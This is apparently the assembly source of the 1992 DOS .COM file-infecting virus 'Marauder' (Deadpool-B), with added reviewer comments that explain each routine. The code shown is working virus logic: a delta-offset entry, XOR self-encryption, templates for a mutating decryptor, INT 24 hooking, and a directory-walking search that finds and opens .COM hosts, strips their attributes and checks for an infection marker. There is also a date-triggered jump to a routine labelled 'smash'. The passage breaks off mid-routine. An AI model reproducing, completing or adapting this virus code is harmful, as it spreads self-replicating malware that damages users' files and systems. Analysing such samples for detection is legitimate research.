; "Marauder" Virus
; AKA Deadpool-B
;
; By Hellraiser
; Of Phalcon/Skism
;
; For virus research only
;
; I always wanted to release this source, so here it is. Now that it's been caught
; take a look at what's inside.
;
; I know it's no great thing, but it's good to learn from. It contains basic
; encryption, mutation, and INT 24 handling.
;
; I will be very upset if I see 100 new versions of this code with some lame kids
; name in place of mine. So just use it to learn from, it's very straightforward.
; --- Assembler / target notes (reviewer) --------------------------------
; Intel syntax in MASM/TASM style (proc/endp, label, EQU).  org 0100h is the
; DOS .COM layout: one segment, PSP in the first 100h bytes, so cs = ds =
; es = ss as the assume below declares.
code segment 'code'
assume cs:code, ds:code, ss:code, es:code
org 0100h
; Scratch areas live past the end of the code image.  endcode is defined
; outside this chunk; every symbol below is an assembled offset and is
; always addressed as [si + ...] at run time (si = load delta, see deadpool).
dta EQU endcode + 10                        ; disk transfer area for the FindFirst/Next calls (why:/ff:)
headlength EQU headend - headstart          ; 4 bytes: 3-byte jmp + 1 marker byte
bodylength EQU bodyend - bodystart          ; bodyend is defined outside this chunk
encryptpart EQU bodyend - mixed_up          ; byte length of the XOR-scrambled region
part1size EQU part2 - part1                 ; sizes of the instruction templates at part1..partb
part2size EQU parta - part2
partasize EQU partb - parta
partbsize EQU dude - partb
mutants EQU chris - part1                   ; template area plus the idbuffer text, up to chris
total_mutant EQU mutants / 2                ; same, in words
encryptlength EQU encryptpart / 2           ; word count for the lodsw/stosw loop in encrypt
virus_size EQU headlength + bodylength + 5 ; head + body + int24 + 2
drive EQU endcode + 110                     ; 1 byte: current drive letter (filled near chris:)
backslash EQU endcode + 111                 ; 2 bytes: ':\' (stored as the word '\:')
orig_path EQU endcode + 113                 ; cwd saved via int 21h/47h; its restore is not in this chunk
dirdta EQU orig_path + 66                   ; second DTA, used for the directory search
myid EQU 88h                                ; infection marker stored right after the head jmp
toolarge EQU 65535 - virus_size             ; NOTE(review): looks like a host-size limit; not used in this chunk
fileattr EQU 21                             ; offsets into the DOS FindFirst DTA record
filetime EQU 22
filedate EQU 24
filename EQU 30
; --- Head: the 4 bytes that replace the start of an infected .COM ---------
; headstart..headend is what an infected host begins with: a 3-byte jmp to
; the appended body, then the marker byte myid.  The code near chris: reads
; a candidate file's first 4 bytes into oldjmp and copies them to thisjmp;
; the check against [oldjmp + 3] is how an already-infected file is recognised.
headstart:
jmp bodystart
db myid                                     ; infection marker
headend:
; Stand-alone "host" for when this image runs by itself (presumably): three
; NOPs, then 0CDh,20h = int 20h (terminate), followed by 1Ah,1Ah.
realprogramstart:
db 90h, 90h, 90h
db 0cdh, 020h, 1ah, 1ah
realprogramend:
; --- Body entry -------------------------------------------------------------
; Delta-offset idiom: call/pop yields the run-time address of deadpool; minus
; its assembled offset gives si = (load address - assembled address).  Every
; data reference below is written [si + label] for that reason.
bodystart:
call deadpool
deadpool:
pop si
sub si,offset deadpool
call encrypt                                ; XOR is its own inverse: this decrypts the scrambled region in place
jmp chris
enc_code dw 0000h                           ; 16-bit XOR key, read by encrypt as [bp + enc_code]
;-----------------------------------------------------------------------
; encrypt — XOR the region ending at bodyend, word by word, with enc_code.
; In:    si = load delta (see deadpool)
; Out:   si unchanged; the region is toggled between plain and scrambled
;        (XOR, so a second call restores the original bytes)
; Clobb: bp, di, flags.  DF is left SET: std is never undone here, so a
;        caller must cld before any forward string op (chris: does).
; Stack: 4 words
;-----------------------------------------------------------------------
encrypt proc near
assume cs:code, ds:code, es:code, ss:code
part1_:
push ax
push bx
push cx
push dx
mov cx, encryptlength                       ; word count of the scrambled region
mov bp, si                                  ; bp = delta, used to reach the key below
add si, offset bodyend                      ; start at the top of the region ...
mov di,si
std                                         ; ... and walk downward one word at a time
xor_loop:
lodsw
xor ax, [bp + enc_code]                     ; key is addressed through the delta as well
stosw                                       ; write back in place (di tracks si)
loop xor_loop
done_:
mov si, bp                                  ; hand the delta back to the caller
pop dx
pop cx
pop bx
pop ax
ret
;nop
encrypt endp
;-----------------------------------------------------------------------
; infect — issue one DOS call while the image is in its scrambled form.
; The region is XORed before and after a single int 21h, so DOS sees the
; encrypted bytes (presumably the file-write path; the caller that sets up
; the function number and registers is not in this chunk).
; In:    si = load delta; other regs as the int 21h function requires
; Out:   whatever the DOS call returns (ax, CF); si preserved by encrypt
; Clobb: bp, di, DF (see encrypt)
;-----------------------------------------------------------------------
infect proc near
call encrypt
int 21h
call encrypt
ret
infect endp
; --- Scrambled region starts here (encryptpart = bodyend - mixed_up) ------
; part1..dude are instruction templates rather than a code path: nothing in
; this chunk jumps to them (bodystart goes to chris after encrypt).  Each
; holds the register saves and loop setup of encrypt proc in a different
; order or direction (cld vs std); part1size/part2size/partasize/partbsize
; measure them.  The code that assembles a fresh decryptor from them is not
; in this chunk.  For detection: the save/setup bytes can differ between
; samples, while the lodsw/xor/stosw/loop core is not among the templates.
mixed_up:
part1:
push dx
push cx
push bx
push ax
mov cx, encryptlength
mov bp, si
add si, offset mixed_up                     ; forward variant: starts at the bottom of the region
mov di,si
cld
part2:
mov si, bp
pop ax
pop bx
pop cx
pop dx
parta:
mov bp, si
add si, offset endcode
mov di, si
push ax
push bx
push cx
push dx
mov cx, encryptlength
std
partb:
pop dx
pop cx
pop bx
pop ax
mov si, bp
dude:
; don't get any ideas lamer
; idbuffer: 0CDh,20h (int 20h) followed by the author/ID text.  It lies
; inside the scrambled region, so on disk it is XORed with enc_code and is
; readable only in memory after decryption.
hellraiser label byte
idbuffer db 0cdh, 20h,' [Marauder] 1992 Hellraiser - Phalcon/Skism. '
stringsize EQU ($ - hellraiser)
chris:
push es
mov ax,3524h
int 21h
mov [si + word ptr oint24], bx
mov [si + word ptr oint24 + 2], es
pop es
mov ax, 2524h
lea dx, [si + newint24]
int 21h
push si
mov ah, 47h
xor dl,dl
add si, offset orig_path
int 21h
pop si
mov ah,19h
int 21h
add al, 41h
mov byte ptr [si + offset drive], al
mov ax, '\:'
mov word ptr [si + offset backslash], ax
;mov byte ptr [si + offset defaultdrive], al
; here's my new tri-dimensional jmp displacement theory in play
push si
pop bp
lea si, [bp + offset oldjmp]
lea di, [bp + offset thisjmp]
mov cx,04h
cld
rep movsb
push bp
pop si
why:
mov ah,1ah
lea dx,[si + dta]
int 21h
mov ah,2ah
int 21h
cmp dx, 0202h
jne ff
jmp smash
ff:
mov ah,4eh
lea dx,[si + filespec]
mov cx, 07h
searchloop:
int 21h
jnc here
;jmp up
mov ah,1ah
lea dx,[si + dirdta]
int 21h
mov ah,3bh
lea dx,[si + offset rootdir]
int 21h
jc at_root
jmp why
at_root:
cmp byte ptr [si + donebefore], 01h
je notokey
mov al,01h
mov [si + donebefore], al
mov ah,4eh
xor cx,cx
mov cl,13h
lea dx, [si + dwildcards]
ffdloop:
int 21h
jnc okey
jmp far ptr nofilesfound
notokey:
mov ah,4fh
jmp ffdloop
okey:
mov ah,3bh
lea dx, [si + offset dirdta + filename]
int 21h
jc notokey
jmp why
here:
mov bx, word ptr [si + offset dta + fileattr]
mov word ptr [si + origattr], bx
mov ax,4301h
xor cx,cx
lea dx, [si + offset dta + filename]
int 21h
jc bad_file2
call openfile
jc bad_file2
mov word ptr [si + offset handle], ax
mov bx, word ptr [si + offset dta + filedate]
mov word ptr [si + origdate], bx
mov bx, word ptr [si + offset dta + filetime]
mov word ptr [si + origtime], bx
xchg bx, ax
mov ah, 3fh
mov cx, 4
lea dx, [si + oldjmp]
int 21h
cmp byte ptr [si + offset oldjmp + 3], myid
jne sick_of_it_all
bad_file:
mov ax,4301h
mov cx, word ptr [si + offset origattr]
lea dx, [si + offset dta + filename]